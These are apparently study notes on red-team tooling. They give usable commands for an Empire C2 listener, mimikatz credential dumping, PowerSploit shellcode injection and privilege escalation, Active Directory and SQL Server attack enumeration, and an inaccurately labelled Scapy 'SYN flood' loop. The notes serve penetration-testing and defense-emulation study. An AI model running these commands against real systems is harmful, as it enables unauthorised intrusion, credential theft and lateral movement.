Bash Scripting
- Use Case: Automate data collection, parsing, command execution
- Example:
# Automate nmap scan & save results
nmap -sV 192.168.1.0/24 -oN scan_results.txt
---
## Empire & PowerSploit
- **Empire Framework**
- **Role**: Post-exploitation (Windows) via PowerShell agents (no `powershell.exe`)
- **Key Workflow**:
```text
uselistener http
set Host http://YOUR_IP
execute
```
- _Listener_: Waits for agents
- _Payload_: Connects target → Empire
- **Credential Harvesting**:
```text
usemodule credentials/mimikatz/logonpasswords
execute
```
- **PowerSploit**
- **Role**: PowerShell scripts for reconnaissance/exploitation
- **Privilege Escalation**:
```powershell
Import-Module PowerSploit/Privesc
Invoke-AllChecks
```
- **Shellcode Injection**:
```powershell
Import-Module PowerSploit/CodeExecution
Invoke-Shellcode -Shellcode (Get-Content shellcode.bin) -ProcessID 1234
```
- **Integration**
- Deploy Empire agent → escalate via `Invoke-AllChecks` → dump creds (`mimikatz`) → lateral movement
---
## PowerView (AD Reconnaissance)
- **Purpose**: Enumerate AD objects (users, groups, computers, trusts)
- **Key Commands**:
```powershell
Get-NetUser
Get-NetGroup
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetComputer
Get-NetDomainTrust
Get-NetSession -ComputerName TARGET_HOST
```
- **Concepts**:
- **Mapping AD**: Discover users/groups/computers
- **High-Value Targets**: Focus on privileged accounts
- **Trust Relationships**: Identify cross-domain attack paths
---
## PowerUpSQL (SQL Server Exploitation)
- **Purpose**: Automate discovery/exploitation of SQL Server instances
- **Key Commands**:
```powershell
Get-SQLInstanceLocal -Verbose
Get-SQLServerInfo -InstanceName "SQLSERVER01"
Invoke-SQLEscalatePriv -Instance "SQLSERVER01" -Verbose
Get-SQLServerLoginDefaultPw
Get-SQLDomainUser -UserState TrustedForDelegation
Get-SQLServerLink -Instance "SQLSERVER01"
```
- **Concepts**:
- **Discovery**: Scan network for SQL instances
- **Privilege Escalation**: Exploit misconfigurations
- **Lateral Movement**: Use linked servers
---
## AD Search (PowerShell)
- **Purpose**: Automate AD information gathering/filtering
- **Essential Cmdlets**:
```powershell
# Retrieve all users in OU
Get-ADUser -Filter * -SearchBase "OU=Sales,DC=Corp,DC=com"
# Users with "Manager" in title
Get-ADUser -Filter {Title -like "*Manager*"} -Properties Title
# Users never logged in
Get-ADUser -Filter * -Properties LastLogonDate |
Where-Object { $_.LastLogonDate -eq $null }
```
- **Advanced Reports**:
```powershell
Get-ADGroupMember "Domain Admins" |
Get-ADUser -Properties DisplayName,EmailAddress |
Select DisplayName,EmailAddress |
Export-Csv C:\Reports\DomainAdmins.csv -NoTypeInformation
```
- **Loop Example**:
```powershell
$OUs = Get-ADOrganizationalUnit -Filter *
foreach ($OU in $OUs) {
Get-ADUser -Filter {Enabled -eq $false} -SearchBase $OU.DistinguishedName |
Select Name,DistinguishedName
}
```
---
## Impacket & Scapy
- **Impacket**
- **Role**: Python scripts for network protocol interactions and packet crafting
- **Scapy**
- **Role**: Packet manipulation (craft/sniff/decode)
- **ARP Scanning**:
```python
# Send ARP requests to 192.168.1.0/24, collect replies
from scapy.all import ARP, Ether, srp
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"), timeout=2)
for sent, received in ans:
print(received.psrc, received.hwsrc)
```
- **TCP SYN Flood**:
```python
# Flood target IP with SYN packets
from scapy.all import IP, TCP, send
for port in range(1, 1025):
send(IP(dst="TARGET_IP")/TCP(dport=port, flags="S"))
```
- **Takeaway**: Automate network reconnaissance and DoS simulations
---
## Caldera (Adversary Emulation)
- **Overview**: MITRE’s BAS platform using **MITRE ATT&CK** framework
- **Workflow**:
1. Deploy agent(s) in virtual environment
2. Agents execute “abilities” (attack steps)
- **Initial Access**: e.g., simulated phishing
- **Credential Dumping**: Mimikatz
- **Lateral Movement**: Use stolen creds
3. Caldera server logs results
- **Benefits**:
- **Automation**: Chain multiple attack techniques
- **Logging/Reporting**: Detailed success/failure insights
- **Repeatable Scenarios**: Compare defenses pre/post-mitigation
---
## Infection Monkey (Malware Simulation)
- **Overview**: Simulates real-world malware in a safe, controlled manner
- **Components**:
- **Agent**: Acts like malware (spreads, steals data)
- **Monkey Island**: C2 server; tracks agent activity
- **Use Cases**:
- Test security controls (firewall, IDS, endpoint)
- Identify vulnerable network segments
- **Benefits**:
- **Realistic Simulation**: Mimics ransomware/worm behavior
- **Actionable Insights**: Pinpoints defense gaps
- **Continuous Improvement**: Iterate to harden posture
---
## Atomic Red Team (Focused Attack Tests)
- **Overview**: Run “atomic tests” mapped to **MITRE ATT&CK**
- **Examples**:
- **Credential Dumping (T1003.001)**
```powershell
Invoke-AtomicTest T1003.001 -TestNumbers 1
```
- **Malicious PowerShell Execution (T1059.001)**
```powershell
Invoke-AtomicTest T1059.001 -TestNumbers 2
```
- **Scheduled Task Persistence (T1053.005)**
```powershell
Invoke-AtomicTest T1053.005 -TestNumbers 1
```
- **Advantages**:
- **Immediate Feedback**: Quick validation of defenses
- **Low Overhead**: Minimal setup; targeted tests
- **Technique-Focused**: Isolate detection gaps